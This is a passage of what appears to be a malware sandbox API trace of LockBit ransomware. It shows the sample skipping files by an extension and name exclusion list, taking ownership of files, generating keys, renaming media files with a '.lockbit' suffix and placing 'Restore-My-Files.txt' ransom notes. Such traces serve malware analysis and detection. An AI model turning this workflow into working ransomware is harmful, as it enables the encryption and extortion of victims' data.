"c:\\program files\\dvd maker\\shared\\dvdstyles\\babyboy\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0079.146] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x70f345b0, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x70f345b0, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x49edb2bd, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x2666c, dwReserved0=0x0, dwReserved1=0x0, cFileName="BabyBoyNotesBackground_PAL.wmv", cAlternateFileName="")) returned 1 [0079.146] lstrcmpiW (lpString1=".", lpString2="BabyBoyNotesBackground_PAL.wmv") returned -1 [0079.146] lstrcmpiW (lpString1="..", lpString2="BabyBoyNotesBackground_PAL.wmv") returned -1 [0079.147] PathFindExtensionW (pszPath="BabyBoyNotesBackground_PAL.wmv") returned=".wmv" [0079.147] lstrcmpiW (lpString1=".386", lpString2=".wmv") returned -1 [0079.147] lstrcmpiW (lpString1=".cmd", lpString2=".wmv") returned -1 [0079.147] lstrcmpiW (lpString1=".exe", lpString2=".wmv") returned -1 [0079.147] lstrcmpiW (lpString1=".ani", lpString2=".wmv") returned -1 [0079.147] lstrcmpiW (lpString1=".adv", lpString2=".wmv") returned -1 [0079.147] lstrcmpiW (lpString1=".theme", lpString2=".wmv") returned -1 [0079.147] lstrcmpiW (lpString1=".msi", lpString2=".wmv") returned -1 [0079.147] lstrcmpiW (lpString1=".msp", lpString2=".wmv") returned -1 [0079.147] lstrcmpiW (lpString1=".com", lpString2=".wmv") returned -1 [0079.147] lstrcmpiW (lpString1=".diagpkg", lpString2=".wmv") returned -1 [0079.147] lstrcmpiW (lpString1=".nls", lpString2=".wmv") returned -1 [0079.147] lstrcmpiW (lpString1=".diagcab", lpString2=".wmv") returned -1 [0079.147] lstrcmpiW (lpString1=".lock", lpString2=".wmv") returned -1 [0079.147] lstrcmpiW (lpString1=".ocx", lpString2=".wmv") returned -1 [0079.147] lstrcmpiW (lpString1=".mpa", lpString2=".wmv") returned -1 [0079.147] lstrcmpiW (lpString1=".cpl", lpString2=".wmv") returned -1 [0079.147] lstrcmpiW (lpString1=".mod", lpString2=".wmv") returned -1 [0079.147] lstrcmpiW (lpString1=".hta", lpString2=".wmv") returned -1 [0079.147] lstrcmpiW (lpString1=".icns", lpString2=".wmv") returned -1 [0079.147] lstrcmpiW (lpString1=".prf", lpString2=".wmv") returned -1 [0079.148] lstrcmpiW (lpString1=".rtp", lpString2=".wmv") returned -1 [0079.148] lstrcmpiW (lpString1=".diagcfg", lpString2=".wmv") returned -1 [0079.148] lstrcmpiW (lpString1=".msstyles", lpString2=".wmv") returned -1 [0079.148] lstrcmpiW (lpString1=".bin", lpString2=".wmv") returned -1 [0079.148] lstrcmpiW (lpString1=".hlp", lpString2=".wmv") returned -1 [0079.148] lstrcmpiW (lpString1=".shs", lpString2=".wmv") returned -1 [0079.148] lstrcmpiW (lpString1=".drv", lpString2=".wmv") returned -1 [0079.148] lstrcmpiW (lpString1=".wpx", lpString2=".wmv") returned 1 [0079.148] lstrcmpiW (lpString1=".bat", lpString2=".wmv") returned -1 [0079.148] lstrcmpiW (lpString1=".rom", lpString2=".wmv") returned -1 [0079.148] lstrcmpiW (lpString1=".msc", lpString2=".wmv") returned -1 [0079.148] lstrcmpiW (lpString1=".spl", lpString2=".wmv") returned -1 [0079.148] lstrcmpiW (lpString1=".ps1", lpString2=".wmv") returned -1 [0079.148] lstrcmpiW (lpString1=".msu", lpString2=".wmv") returned -1 [0079.148] lstrcmpiW (lpString1=".ics", lpString2=".wmv") returned -1 [0079.148] lstrcmpiW (lpString1=".key", lpString2=".wmv") returned -1 [0079.148] lstrcmpiW (lpString1=".mp3", lpString2=".wmv") returned -1 [0079.148] lstrcmpiW (lpString1=".reg", lpString2=".wmv") returned -1 [0079.148] lstrcmpiW (lpString1=".dll", lpString2=".wmv") returned -1 [0079.148] lstrcmpiW (lpString1=".ini", lpString2=".wmv") returned -1 [0079.148] lstrcmpiW (lpString1=".idx", lpString2=".wmv") returned -1 [0079.149] lstrcmpiW (lpString1=".sys", lpString2=".wmv") returned -1 [0079.149] lstrcmpiW (lpString1=".hlp", lpString2=".wmv") returned -1 [0079.149] lstrcmpiW (lpString1=".ico", lpString2=".wmv") returned -1 [0079.149] lstrcmpiW (lpString1=".lnk", lpString2=".wmv") returned -1 [0079.149] lstrcmpiW (lpString1=".rdp", lpString2=".wmv") returned -1 [0079.149] lstrcmpiW (lpString1=".lockbit", lpString2=".wmv") returned -1 [0079.149] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BabyBoyNotesBackground_PAL.wmv") returned 1 [0079.149] lstrcmpiW (lpString1="ntldr", lpString2="BabyBoyNotesBackground_PAL.wmv") returned 1 [0079.149] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BabyBoyNotesBackground_PAL.wmv") returned 1 [0079.149] lstrcmpiW (lpString1="bootsect.bak", lpString2="BabyBoyNotesBackground_PAL.wmv") returned 1 [0079.149] lstrcmpiW (lpString1="autorun.inf", lpString2="BabyBoyNotesBackground_PAL.wmv") returned -1 [0079.149] lstrcmpiW (lpString1="thumbs.db", lpString2="BabyBoyNotesBackground_PAL.wmv") returned 1 [0079.149] lstrcmpiW (lpString1="iconcache.db", lpString2="BabyBoyNotesBackground_PAL.wmv") returned 1 [0079.149] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\") returned="" [0079.149] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyNotesBackground_PAL.wmv") returned=".wmv" [0079.149] lstrcmpiW (lpString1=".rar", lpString2=".wmv") returned -1 [0079.149] lstrcmpiW (lpString1=".zip", lpString2=".wmv") returned 1 [0079.149] lstrcmpiW (lpString1=".7z", lpString2=".wmv") returned -1 [0079.149] lstrcmpiW (lpString1=".ckp", lpString2=".wmv") returned -1 [0079.149] lstrcmpiW (lpString1=".dacpac", lpString2=".wmv") returned -1 [0079.149] lstrcmpiW (lpString1=".db", lpString2=".wmv") returned -1 [0079.150] lstrcmpiW (lpString1=".db-shm", lpString2=".wmv") returned -1 [0079.150] lstrcmpiW (lpString1=".db-wal", lpString2=".wmv") returned -1 [0079.150] lstrcmpiW (lpString1=".db3", lpString2=".wmv") returned -1 [0079.150] lstrcmpiW (lpString1=".dbf", lpString2=".wmv") returned -1 [0079.150] lstrcmpiW (lpString1=".dbc", lpString2=".wmv") returned -1 [0079.150] lstrcmpiW (lpString1=".dbs", lpString2=".wmv") returned -1 [0079.150] lstrcmpiW (lpString1=".dbt", lpString2=".wmv") returned -1 [0079.150] lstrcmpiW (lpString1=".dbv", lpString2=".wmv") returned -1 [0079.150] lstrcmpiW (lpString1=".frm", lpString2=".wmv") returned -1 [0079.150] lstrcmpiW (lpString1=".mdf", lpString2=".wmv") returned -1 [0079.150] lstrcmpiW (lpString1=".mrg", lpString2=".wmv") returned -1 [0079.150] lstrcmpiW (lpString1=".mwb", lpString2=".wmv") returned -1 [0079.150] lstrcmpiW (lpString1=".myd", lpString2=".wmv") returned -1 [0079.150] lstrcmpiW (lpString1=".ndf", lpString2=".wmv") returned -1 [0079.150] lstrcmpiW (lpString1=".qry", lpString2=".wmv") returned -1 [0079.150] lstrcmpiW (lpString1=".sdb", lpString2=".wmv") returned -1 [0079.150] lstrcmpiW (lpString1=".sdf", lpString2=".wmv") returned -1 [0079.150] lstrcmpiW (lpString1=".sql", lpString2=".wmv") returned -1 [0079.150] lstrcmpiW (lpString1=".sqlite", lpString2=".wmv") returned -1 [0079.150] lstrcmpiW (lpString1=".sqlite3", lpString2=".wmv") returned -1 [0079.150] lstrcmpiW (lpString1=".sqlitedb", lpString2=".wmv") returned -1 [0079.150] lstrcmpiW (lpString1=".tmd", lpString2=".wmv") returned -1 [0079.151] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyNotesBackground_PAL.wmv.lockbit") returned 91 [0079.151] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyNotesBackground_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babyboy\\babyboynotesbackground_pal.wmv"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0079.151] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0079.152] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0079.152] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0079.152] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0079.152] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0079.152] RtlFreeAnsiString (AnsiString="\\") [0079.152] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x3c0) returned 0x0 [0079.152] malloc (_Size=0x200) returned 0x77d800 [0079.152] NtQueryInformationToken (in: TokenHandle=0x3c0, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x77d800, ReturnLength=0x3d6acd8) returned 0x0 [0079.152] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0079.152] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0079.153] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyNotesBackground_PAL.wmv", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0079.153] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyNotesBackground_PAL.wmv", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0079.153] CloseHandle (hObject=0x3c0) returned 1 [0079.153] free (_Block=0x77d800) [0079.153] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyNotesBackground_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babyboy\\babyboynotesbackground_pal.wmv"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3c0 [0079.154] CreateIoCompletionPort (FileHandle=0x3c0, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0079.154] malloc (_Size=0x40068) returned 0x3db00b8 [0079.155] GetFileSizeEx (in: hFile=0x3c0, lpFileSize=0x3db00d0 | out: lpFileSize=0x3db00d0*=157292) returned 1 [0079.155] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0079.156] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0079.156] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3df00ec, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3df00ec) returned 0x0 [0079.156] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0079.156] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0079.156] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3df00fc, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3df00fc) returned 0x0 [0079.157] ReadFile (in: hFile=0x3c0, lpBuffer=0x3db00ec, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3db00b8 | out: lpBuffer=0x3db00ec*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3db00b8) returned 1 [0079.182] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyNotesBackground_PAL.wmv.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyNotesBackground_PAL.wmv.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0079.182] malloc (_Size=0xcc) returned 0x77d800 [0079.182] NtSetInformationFile (FileHandle=0x3c0, IoStatusBlock=0x3d6aa8c, FileInformation=0x77d800, Length=0xcc, FileInformationClass=0xa) returned 0x0 [0079.183] free (_Block=0x77d800) [0079.183] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyNotesBackground_PAL.wmv" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy") returned 1 [0079.183] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\Restore-My-Files.txt") returned 73 [0079.183] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babyboy\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0079.183] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x70f5a70d, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x70f5a70d, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x49f0141b, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x2472c, dwReserved0=0x0, dwReserved1=0x0, cFileName="BabyBoyScenesBackground.wmv", cAlternateFileName="")) returned 1 [0079.183] lstrcmpiW (lpString1=".", lpString2="BabyBoyScenesBackground.wmv") returned -1 [0079.183] lstrcmpiW (lpString1="..", lpString2="BabyBoyScenesBackground.wmv") returned -1 [0079.183] PathFindExtensionW (pszPath="BabyBoyScenesBackground.wmv") returned=".wmv" [0079.183] lstrcmpiW (lpString1=".386", lpString2=".wmv") returned -1 [0079.183] lstrcmpiW (lpString1=".cmd", lpString2=".wmv") returned -1 [0079.183] lstrcmpiW (lpString1=".exe", lpString2=".wmv") returned -1 [0079.183] lstrcmpiW (lpString1=".ani", lpString2=".wmv") returned -1 [0079.183] lstrcmpiW (lpString1=".adv", lpString2=".wmv") returned -1 [0079.183] lstrcmpiW (lpString1=".theme", lpString2=".wmv") returned -1 [0079.184] lstrcmpiW (lpString1=".msi", lpString2=".wmv") returned -1 [0079.184] lstrcmpiW (lpString1=".msp", lpString2=".wmv") returned -1 [0079.184] lstrcmpiW (lpString1=".com", lpString2=".wmv") returned -1 [0079.184] lstrcmpiW (lpString1=".diagpkg", lpString2=".wmv") returned -1 [0079.184] lstrcmpiW (lpString1=".nls", lpString2=".wmv") returned -1 [0079.184] lstrcmpiW (lpString1=".diagcab", lpString2=".wmv") returned -1 [0079.184] lstrcmpiW (lpString1=".lock", lpString2=".wmv") returned -1 [0079.184] lstrcmpiW (lpString1=".ocx", lpString2=".wmv") returned -1 [0079.184] lstrcmpiW (lpString1=".mpa", lpString2=".wmv") returned -1 [0079.184] lstrcmpiW (lpString1=".cpl", lpString2=".wmv") returned -1 [0079.184] lstrcmpiW (lpString1=".mod", lpString2=".wmv") returned -1 [0079.184] lstrcmpiW (lpString1=".hta", lpString2=".wmv") returned -1 [0079.184] lstrcmpiW (lpString1=".icns", lpString2=".wmv") returned -1 [0079.184] lstrcmpiW (lpString1=".prf", lpString2=".wmv") returned -1 [0079.184] lstrcmpiW (lpString1=".rtp", lpString2=".wmv") returned -1 [0079.184] lstrcmpiW (lpString1=".diagcfg", lpString2=".wmv") returned -1 [0079.184] lstrcmpiW (lpString1=".msstyles", lpString2=".wmv") returned -1 [0079.184] lstrcmpiW (lpString1=".bin", lpString2=".wmv") returned -1 [0079.184] lstrcmpiW (lpString1=".hlp", lpString2=".wmv") returned -1 [0079.184] lstrcmpiW (lpString1=".shs", lpString2=".wmv") returned -1 [0079.184] lstrcmpiW (lpString1=".drv", lpString2=".wmv") returned -1 [0079.184] lstrcmpiW (lpString1=".wpx", lpString2=".wmv") returned 1 [0079.185] lstrcmpiW (lpString1=".bat", lpString2=".wmv") returned -1 [0079.185] lstrcmpiW (lpString1=".rom", lpString2=".wmv") returned -1 [0079.185] lstrcmpiW (lpString1=".msc", lpString2=".wmv") returned -1 [0079.185] lstrcmpiW (lpString1=".spl", lpString2=".wmv") returned -1 [0079.185] lstrcmpiW (lpString1=".ps1", lpString2=".wmv") returned -1 [0079.185] lstrcmpiW (lpString1=".msu", lpString2=".wmv") returned -1 [0079.185] lstrcmpiW (lpString1=".ics", lpString2=".wmv") returned -1 [0079.185] lstrcmpiW (lpString1=".key", lpString2=".wmv") returned -1 [0079.185] lstrcmpiW (lpString1=".mp3", lpString2=".wmv") returned -1 [0079.185] lstrcmpiW (lpString1=".reg", lpString2=".wmv") returned -1 [0079.185] lstrcmpiW (lpString1=".dll", lpString2=".wmv") returned -1 [0079.185] lstrcmpiW (lpString1=".ini", lpString2=".wmv") returned -1 [0079.185] lstrcmpiW (lpString1=".idx", lpString2=".wmv") returned -1 [0079.185] lstrcmpiW (lpString1=".sys", lpString2=".wmv") returned -1 [0079.185] lstrcmpiW (lpString1=".hlp", lpString2=".wmv") returned -1 [0079.185] lstrcmpiW (lpString1=".ico", lpString2=".wmv") returned -1 [0079.185] lstrcmpiW (lpString1=".lnk", lpString2=".wmv") returned -1 [0079.185] lstrcmpiW (lpString1=".rdp", lpString2=".wmv") returned -1 [0079.185] lstrcmpiW (lpString1=".lockbit", lpString2=".wmv") returned -1 [0079.186] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BabyBoyScenesBackground.wmv") returned 1 [0079.186] lstrcmpiW (lpString1="ntldr", lpString2="BabyBoyScenesBackground.wmv") returned 1 [0079.186] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BabyBoyScenesBackground.wmv") returned 1 [0079.186] lstrcmpiW (lpString1="bootsect.bak", lpString2="BabyBoyScenesBackground.wmv") returned 1 [0079.186] lstrcmpiW (lpString1="autorun.inf", lpString2="BabyBoyScenesBackground.wmv") returned -1 [0079.186] lstrcmpiW (lpString1="thumbs.db", lpString2="BabyBoyScenesBackground.wmv") returned 1 [0079.186] lstrcmpiW (lpString1="iconcache.db", lpString2="BabyBoyScenesBackground.wmv") returned 1 [0079.186] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\") returned="" [0079.186] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyScenesBackground.wmv") returned=".wmv" [0079.186] lstrcmpiW (lpString1=".rar", lpString2=".wmv") returned -1 [0079.186] lstrcmpiW (lpString1=".zip", lpString2=".wmv") returned 1 [0079.186] lstrcmpiW (lpString1=".7z", lpString2=".wmv") returned -1 [0079.186] lstrcmpiW (lpString1=".ckp", lpString2=".wmv") returned -1 [0079.186] lstrcmpiW (lpString1=".dacpac", lpString2=".wmv") returned -1 [0079.186] lstrcmpiW (lpString1=".db", lpString2=".wmv") returned -1 [0079.186] lstrcmpiW (lpString1=".db-shm", lpString2=".wmv") returned -1 [0079.186] lstrcmpiW (lpString1=".db-wal", lpString2=".wmv") returned -1 [0079.186] lstrcmpiW (lpString1=".db3", lpString2=".wmv") returned -1 [0079.186] lstrcmpiW (lpString1=".dbf", lpString2=".wmv") returned -1 [0079.186] lstrcmpiW (lpString1=".dbc", lpString2=".wmv") returned -1 [0079.186] lstrcmpiW (lpString1=".dbs", lpString2=".wmv") returned -1 [0079.187] lstrcmpiW (lpString1=".dbt", lpString2=".wmv") returned -1 [0079.187] lstrcmpiW (lpString1=".dbv", lpString2=".wmv") returned -1 [0079.187] lstrcmpiW (lpString1=".frm", lpString2=".wmv") returned -1 [0079.187] lstrcmpiW (lpString1=".mdf", lpString2=".wmv") returned -1 [0079.187] lstrcmpiW (lpString1=".mrg", lpString2=".wmv") returned -1 [0079.187] lstrcmpiW (lpString1=".mwb", lpString2=".wmv") returned -1 [0079.187] lstrcmpiW (lpString1=".myd", lpString2=".wmv") returned -1 [0079.187] lstrcmpiW (lpString1=".ndf", lpString2=".wmv") returned -1 [0079.187] lstrcmpiW (lpString1=".qry", lpString2=".wmv") returned -1 [0079.187] lstrcmpiW (lpString1=".sdb", lpString2=".wmv") returned -1 [0079.187] lstrcmpiW (lpString1=".sdf", lpString2=".wmv") returned -1 [0079.187] lstrcmpiW (lpString1=".sql", lpString2=".wmv") returned -1 [0079.187] lstrcmpiW (lpString1=".sqlite", lpString2=".wmv") returned -1 [0079.187] lstrcmpiW (lpString1=".sqlite3", lpString2=".wmv") returned -1 [0079.187] lstrcmpiW (lpString1=".sqlitedb", lpString2=".wmv") returned -1 [0079.187] lstrcmpiW (lpString1=".tmd", lpString2=".wmv") returned -1 [0079.187] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyScenesBackground.wmv.lockbit") returned 88 [0079.187] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyScenesBackground.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babyboy\\babyboyscenesbackground.wmv"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0079.197] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0079.198] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0079.198] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0079.198] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0079.198] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0079.198] RtlFreeAnsiString (AnsiString="\\") [0079.199] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x3a0) returned 0x0 [0079.199] malloc (_Size=0x200) returned 0x77d800 [0079.199] NtQueryInformationToken (in: TokenHandle=0x3a0, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x77d800, ReturnLength=0x3d6acd8) returned 0x0 [0079.199] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0079.199] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0079.199] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyScenesBackground.wmv", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0079.199] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyScenesBackground.wmv", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0079.200] CloseHandle (hObject=0x3a0) returned 1 [0079.200] free (_Block=0x77d800) [0079.200] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyScenesBackground.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babyboy\\babyboyscenesbackground.wmv"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3a0 [0079.200] CreateIoCompletionPort (FileHandle=0x3a0, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0079.200] malloc (_Size=0x40068) returned 0x3d70048 [0079.200] GetFileSizeEx (in: hFile=0x3a0, lpFileSize=0x3d70060 | out: lpFileSize=0x3d70060*=149292) returned 1 [0079.200] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0079.201] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0079.201] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db007c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db007c) returned 0x0 [0079.201] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0079.201] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0079.201] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db008c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db008c) returned 0x0 [0079.201] ReadFile (in: hFile=0x3a0, lpBuffer=0x3d7007c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048) returned 0x0 [0079.208] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyScenesBackground.wmv.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyScenesBackground.wmv.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0079.208] malloc (_Size=0xc6) returned 0x77d800 [0079.208] NtSetInformationFile (FileHandle=0x3a0, IoStatusBlock=0x3d6aa8c, FileInformation=0x77d800, Length=0xc6, FileInformationClass=0xa) returned 0x0 [0079.208] free (_Block=0x77d800) [0079.208] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyScenesBackground.wmv" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy") returned 1 [0079.208] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\Restore-My-Files.txt") returned 73 [0079.209] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babyboy\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0079.209] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x70f8086a, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x70f8086a, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x49f0141b, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, 